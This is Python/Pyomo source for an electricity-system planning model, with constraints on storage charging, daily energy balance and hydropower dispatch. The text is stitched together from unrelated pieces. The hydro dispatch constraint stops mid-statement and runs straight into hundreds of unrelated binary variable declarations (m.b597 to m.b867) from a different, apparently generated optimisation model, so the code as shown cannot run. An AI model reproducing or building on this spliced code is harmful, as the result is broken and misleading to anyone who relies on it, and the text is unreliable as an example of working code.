<= model.vNewProcDispCap_TCD[sProcDisp] * model.pNewProcDispEAF_TCD[sProcDisp]
setattr(model, "conProcDispPwOutGrossNewTest_TCD_TS", pe.Constraint(model.setProcNewDisp_TCD, \
model.setTSRT_TS, rule = ruleProcessPowerOutGross_Disp))
### net power output of new candidate dispatchable units
def ruleProcessPowerOutNet_Disp(model, sProcDisp, sTimeSlice) :
return model.vNewProcDispPwOutNetTest_TCD_TS[sProcDisp, sTimeSlice] \
== model.vNewProcDispPwOutGrsTest_TCD_TS[sProcDisp, sTimeSlice] \
* (1-model.pNewProcDispOUS_TCD[sProcDisp])
setattr(model, "conProcDispPwOutNetNewTest_TCD_TS", pe.Constraint(model.setProcNewDisp_TCD, \
model.setTSRT_TS, rule = ruleProcessPowerOutNet_Disp))
return
##### ---- storage --------------------------------------------------- #####
def constStorageOpr_Exist(model, objMarket):
''' existing storage system operation constraints '''
### max hourly output of existing units (MW)
def ruleStorPowerOutMax(model, sProcStor, sTimeSlice) :
# only non-dispatchable generation
return model.vExProcStorPwOut_TCS_TS[sProcStor, sTimeSlice] \
<= model.pExProcStorCap_TCS[sProcStor] * model.pExProcStorEAF_TCS[sProcStor]
setattr(model, "conStorPowerOutMax_TCS_TS", pe.Constraint(model.setProcBaseStor_TCS, \
model.setTimeSlice_TS, rule = ruleStorPowerOutMax))
### max hourly input of new units (MW)
def ruleStorPowerInMax(model, sProcStor, sTimeSlice) :
# only non-dispatchable generation
return model.vExProcStorPwIn_TCS_TS[sProcStor, sTimeSlice] \
<= model.pExProcStorCap_TCS[sProcStor] * model.pExProcStorEAF_TCS[sProcStor]
setattr(model, "conStorPowerInMax_TCS_TS", pe.Constraint(model.setProcBaseStor_TCS, \
model.setTimeSlice_TS, rule = ruleStorPowerInMax))
### daily total generation constraint (MWh)
def ruleStorDayGen(model, sProcStor, setDay_DY) :
fCapacity = model.pExProcStorCap_TCS[sProcStor] * model.pExProcStorEAF_TCS[sProcStor] # MW
fMaxDayOutput = fCapacity * model.pExProcStorDur_TCS[sProcStor] # total stored energy, MW -> MWh
fDayOutput = 0
liTSInDay = model.pTSIndInDay_DY[setDay_DY].split(';')
for sTSIndex in liTSInDay:
iTSRepHour = model.pTSRepHourDay_TS[sTSIndex]
fDayOutput += model.vExProcStorPwOut_TCS_TS[sProcStor, sTSIndex] * iTSRepHour
return fDayOutput <= fMaxDayOutput
setattr(model, "conStorDayGen_TCS_DY", pe.Constraint(model.setProcBaseStor_TCS, \
model.setDay_DY, rule = ruleStorDayGen))
### daily input/output balance constraint
def ruleStorDayBalance(model, sProcStor, setDay_DY) :
        fGrossEfficiency = model.pExProcStorEff_TCS[sProcStor]
fDayOutput = 0
fDayInput = 0
liTSInDay = model.pTSIndInDay_DY[setDay_DY].split(';')
for sTSIndex in liTSInDay:
iTSRepHour = model.pTSRepHourDay_TS[sTSIndex]
fDayOutput += model.vExProcStorPwOut_TCS_TS[sProcStor, sTSIndex] * iTSRepHour
fDayInput += model.vExProcStorPwIn_TCS_TS[sProcStor, sTSIndex] * iTSRepHour
        return fDayInput == (fDayOutput / fGrossEfficiency)
setattr(model, "conStorDayBalance_TCS_DY", pe.Constraint(model.setProcBaseStor_TCS, \
model.setDay_DY, rule = ruleStorDayBalance))
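    # Worked reading of the daily balance (hypothetical numbers): with a
    # round-trip efficiency of 0.8, delivering 80 MWh of output over a day
    # forces the charging side to draw 80 / 0.8 = 100 MWh of input.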
return
def constStorageOpr_New(model, objMarket):
''' new storage system operation constraints '''
### max hourly output of new units (MW)
def ruleStorPowerOutMax(model, sProcStor, sTimeSlice) :
# only non-dispatchable generation
return model.vNewProcStorPwOut_TCS_TS[sProcStor, sTimeSlice] \
<= model.vNewProcStorCap_TCS[sProcStor] * model.pNewProcStorEAF_TCS[sProcStor]
setattr(model, "conStorPowerOutMaxNew_TCS_TS", pe.Constraint(model.setProcNewStor_TCS, \
model.setTimeSlice_TS, rule = ruleStorPowerOutMax))
### max hourly input of new units (MW)
def ruleStorPowerInMax(model, sProcStor, sTimeSlice) :
# only non-dispatchable generation
return model.vNewProcStorPwIn_TCS_TS[sProcStor, sTimeSlice] \
<= model.vNewProcStorCap_TCS[sProcStor] * model.pNewProcStorEAF_TCS[sProcStor]
setattr(model, "conStorPowerInMaxNew_TCS_TS", pe.Constraint(model.setProcNewStor_TCS, \
model.setTimeSlice_TS, rule = ruleStorPowerInMax))
### daily total generation constraint (MWh)
def ruleStorDayGen(model, sProcStor, setDay_DY) :
fCapacity = model.vNewProcStorCap_TCS[sProcStor] * model.pNewProcStorEAF_TCS[sProcStor] # MW
fMaxDayOutput = fCapacity * model.pNewProcStorDur_TCS[sProcStor] # total stored energy, MW -> MWh
fDayOutput = 0
liTSInDay = model.pTSIndInDay_DY[setDay_DY].split(';')
for sTSIndex in liTSInDay:
iTSRepHour = model.pTSRepHourDay_TS[sTSIndex]
fDayOutput += model.vNewProcStorPwOut_TCS_TS[sProcStor, sTSIndex] * iTSRepHour
return fDayOutput <= fMaxDayOutput
setattr(model, "conStorDayGenNew_TCS_DY", pe.Constraint(model.setProcNewStor_TCS, \
model.setDay_DY, rule = ruleStorDayGen))
### daily input/output balance constraint
def ruleStorDayBalance(model, sProcStor, setDay_DY) :
        fGrossEfficiency = model.pNewProcStorEff_TCS[sProcStor]
fDayOutput = 0
fDayInput = 0
liTSInDay = model.pTSIndInDay_DY[setDay_DY].split(';')
for sTSIndex in liTSInDay:
iTSRepHour = model.pTSRepHourDay_TS[sTSIndex]
fDayOutput += model.vNewProcStorPwOut_TCS_TS[sProcStor, sTSIndex] * iTSRepHour
fDayInput += model.vNewProcStorPwIn_TCS_TS[sProcStor, sTSIndex] * iTSRepHour
        return fDayInput == (fDayOutput / fGrossEfficiency)
setattr(model, "conStorDayBalanceNew_TCS_DY", pe.Constraint(model.setProcNewStor_TCS, \
model.setDay_DY, rule = ruleStorDayBalance))
### installation capacity limit (PHS)
def ruleStorInstLim(model, sProcStor) :
sTech = str(sProcStor).split("/")[1]
if sTech[0:6] == "HYD_PS":
return model.vNewProcStorCap_TCS[sProcStor] <= model.pNewProcStorCapLim_TCS[sProcStor]
else:
return pe.Constraint.Skip
setattr(model, "conStorInstLimNew_TCS_DY", pe.Constraint(model.setProcNewStor_TCS, rule = ruleStorInstLim))
return
##### ---- storage (Testing TS) ------------------------------------------------------- #####
def constStorageOpr_Exist_RT(model, objMarket):
''' existing storage system operation constraints on testing TS '''
### max hourly output of existing units (MW)
def ruleStorPowerOutMax(model, sProcStor, sTimeSlice) :
fMinOutput = model.pExProcStorCap_TCS[sProcStor] * model.pExProcStorEAF_TCS[sProcStor] \
                * model.pExProcStorDur_TCS[sProcStor] / 12
# only non-dispatchable generation
return model.vExProcStorPwOutTest_TCS_TS[sProcStor, sTimeSlice] <= fMinOutput
setattr(model, "conStorPowerOutMaxTest_TCS_TS", pe.Constraint(model.setProcBaseStor_TCS, \
model.setTSRT_TS, rule = ruleStorPowerOutMax))
return
def constStorageOpr_New_RT(model, objMarket):
''' new storage system operation constraints on testing TS '''
### max hourly output of new units (MW)
def ruleStorPowerOutMax(model, sProcStor, sTimeSlice) :
fMinOutput = model.vNewProcStorCap_TCS[sProcStor] * model.pNewProcStorEAF_TCS[sProcStor] \
* model.pNewProcStorDur_TCS[sProcStor] / 12
# only non-dispatchable generation
return model.vNewProcStorPwOutTest_TCS_TS[sProcStor, sTimeSlice] <= fMinOutput
setattr(model, "conStorPowerOutMaxNewTest_TCS_TS", pe.Constraint(model.setProcNewStor_TCS, \
model.setTSRT_TS, rule = ruleStorPowerOutMax))
return
##### ---- hydro ------------------------------------------------------- #####
def constHydropowerOpr_Exist(model, objMarket):
''' existing large hydropower operation constraints '''
### small hydro output
def ruleHydrPowerOutputSml(model, TechHydro, sTimeSlice) :
sTech = str(TechHydro).split("/")[1]
if sTech[0:6] == "HYD_SM":
# default generation
return model.vExProcHydrPwOut_TCH_TS[TechHydro, sTimeSlice] \
== model.pExProcHydrGen_TCH_TS[TechHydro, sTimeSlice]
else:
return pe.Constraint.Skip
setattr(model, "conHydrPwOutputSml_TCH_TS", pe.Constraint(model.setProcBaseHydr_TCH, \
model.setTimeSlice_TS, rule = ruleHydrPowerOutputSml))
### large hydro generation limit - upper bound
def ruleHydrPowerOutUpBnd(model, TechHydro, sTimeSlice) :
sTech = str(TechHydro).split("/")[1]
if sTech[0:6] == "HYD_LG":
fCapacity = model.pExProcHydrCap_TCH[TechHydro]
fEAF = model.pExProcHydrEAF_TCH[TechHydro]
return model.vExProcHydrPwOut_TCH_TS[TechHydro, sTimeSlice] <= fCapacity * fEAF
else:
return pe.Constraint.Skip
setattr(model, "conHydrPwOutUpBnd_TCH_TS", pe.Constraint(model.setProcBaseHydr_TCH, \
model.setTimeSlice_TS, rule = ruleHydrPowerOutUpBnd))
### large hydro generation limit - lower bound
def ruleHydrPowerOutLowBnd(model, TechHydro, sTimeSlice) :
iDispatchBase = 0.3
sTech = str(TechHydro).split("/")[1]
if sTech[0:6] == "HYD_LG":
            ### the lower limit is 30% CF; smaller than this is non-dispatchable (this is not subject to EAF)
fCapacity = model.pExProcHydrCap_TCH[TechHydro]
defaultGen = float(model.pExProcHydrGen_TCH_TS[TechHydro, sTimeSlice])
if fCapacity > 0:
if (defaultGen / fCapacity) >= iDispatchBase:
return model.vExProcHydrPwOut_TCH_TS[TechHydro, sTimeSlice] >= fCapacity * iDispatchBase
else:
return model.vExProcHydrPwOut_TCH_TS[TechHydro, sTimeSlice] == defaultGen
else:
return model.vExProcHydrPwOut_TCH_TS[TechHydro, sTimeSlice] == 0
else:
return pe.Constraint.Skip
setattr(model, "conHydrPwOutLowBnd_TCH_TS", pe.Constraint(model.setProcBaseHydr_TCH, \
model.setTimeSlice_TS, rule = ruleHydrPowerOutLowBnd))
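    # Worked reading of the bound above (hypothetical numbers): for a 100 MW
    # large hydro unit, a time slice whose default generation is 40 MW
    # (CF 0.4 >= 0.3) may be dispatched anywhere from 30 MW up to the upper
    # bound, while a slice with a default of 20 MW (CF 0.2 < 0.3) is fixed at
    # 20 MW, and a zero-capacity unit is fixed at 0.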
### large hydro generation daily dispatch
def ruleHydrPowerOutDispatch(model, TechHydro, setDay):
iDispatchBase = 0.3
sTech = str(TechHydro).split("/")[1]
if sTech[0:6] == "HYD_LG":
fCapacity = model.pExProcHydrCap_TCH[TechHydro] # MW
if fCapacity > 0:
liTSInDay = model.pTSIndInDay_DY[setDay].split(';')
defaultGen = float(model.pExProcHydrGen_TCH_TS[TechHydro, model.setTimeSlice_TS[1]])
if (defaultGen / fCapacity) >= iDispatchBase:
# total dispatchable
total_dispatchable = 0
for sTSIndex in liTSInDay:
iTSRepHour = model.pTSRepHourDay_TS[sTSIndex]
hourGen = float(model.pExProcHydrGen_TCH_TS[TechHydro, sTSIndex])
total_dispatchable = total_dispatchable + (hourGen * iTSRepHour) # MWh
# total generation
total_generation = 0
for sTSIndex in liTSInDay:
iTSRepHour = model.pTSRepHourDay_TS[sTSIndex]
hourGen = model.vExProcHydrPwOut_TCH_TS[TechHydro, sTSIndex]
total_generation = total_generation + ( hourGen * iTSRepHour )
return total_generation == total_dispatchable
else:
return pe.Constraint.Skip # CF is too low, non-dispatchable
else:
return pe.Constraint.Skip
else:
return pe.Constraint.Skip
setattr(model, "conHydrPwOutOpr_TCH_DY", pe.Constraint(model.setProcBaseHydr_TCH, \
        model.setDay_DY, rule
= Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b597 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b598 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b599 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b600 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b601 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b602 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b603 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b604 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b605 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b606 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b607 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b608 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b609 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b610 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b611 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b612 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b613 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b614 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b615 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b616 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b617 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b618 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b619 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b620 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b621 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b622 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b623 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b624 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b625 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b626 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b627 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b628 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b629 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b630 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b631 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b632 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b633 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b634 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b635 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b636 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b637 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b638 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b639 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b640 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b641 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b642 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b643 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b644 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b645 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b646 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b647 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b648 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b649 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b650 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b651 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b652 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b653 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b654 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b655 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b656 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b657 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b658 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b659 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b660 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b661 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b662 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b663 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b664 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b665 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b666 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b667 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b668 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b669 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b670 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b671 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b672 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b673 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b674 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b675 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b676 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b677 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b678 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b679 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b680 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b681 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b682 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b683 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b684 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b685 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b686 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b687 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b688 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b689 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b690 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b691 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b692 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b693 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b694 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b695 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b696 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b697 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b698 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b699 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b700 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b701 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b702 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b703 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b704 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b705 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b706 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b707 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b708 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b709 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b710 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b711 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b712 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b713 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b714 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b715 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b716 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b717 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b718 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b719 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b720 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b721 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b722 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b723 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b724 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b725 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b726 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b727 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b728 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b729 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b730 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b731 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b732 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b733 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b734 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b735 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b736 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b737 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b738 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b739 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b740 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b741 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b742 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b743 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b744 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b745 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b746 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b747 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b748 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b749 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b750 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b751 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b752 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b753 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b754 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b755 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b756 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b757 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b758 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b759 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b760 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b761 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b762 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b763 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b764 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b765 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b766 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b767 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b768 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b769 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b770 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b771 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b772 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b773 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b774 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b775 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b776 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b777 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b778 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b779 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b780 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b781 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b782 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b783 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b784 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b785 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b786 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b787 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b788 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b789 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b790 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b791 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b792 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b793 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b794 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b795 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b796 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b797 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b798 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b799 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b800 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b801 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b802 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b803 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b804 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b805 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b806 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b807 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b808 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b809 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b810 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b811 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b812 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b813 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b814 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b815 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b816 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b817 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b818 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b819 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b820 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b821 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b822 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b823 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b824 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b825 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b826 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b827 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b828 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b829 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b830 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b831 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b832 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b833 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b834 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b835 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b836 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b837 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b838 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b839 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b840 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b841 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b842 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b843 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b844 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b845 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b846 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b847 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b848 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b849 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b850 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b851 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b852 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b853 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b854 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b855 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b856 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b857 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b858 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b859 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b860 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b861 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b862 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b863 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b864 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b865 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b866 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b867 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
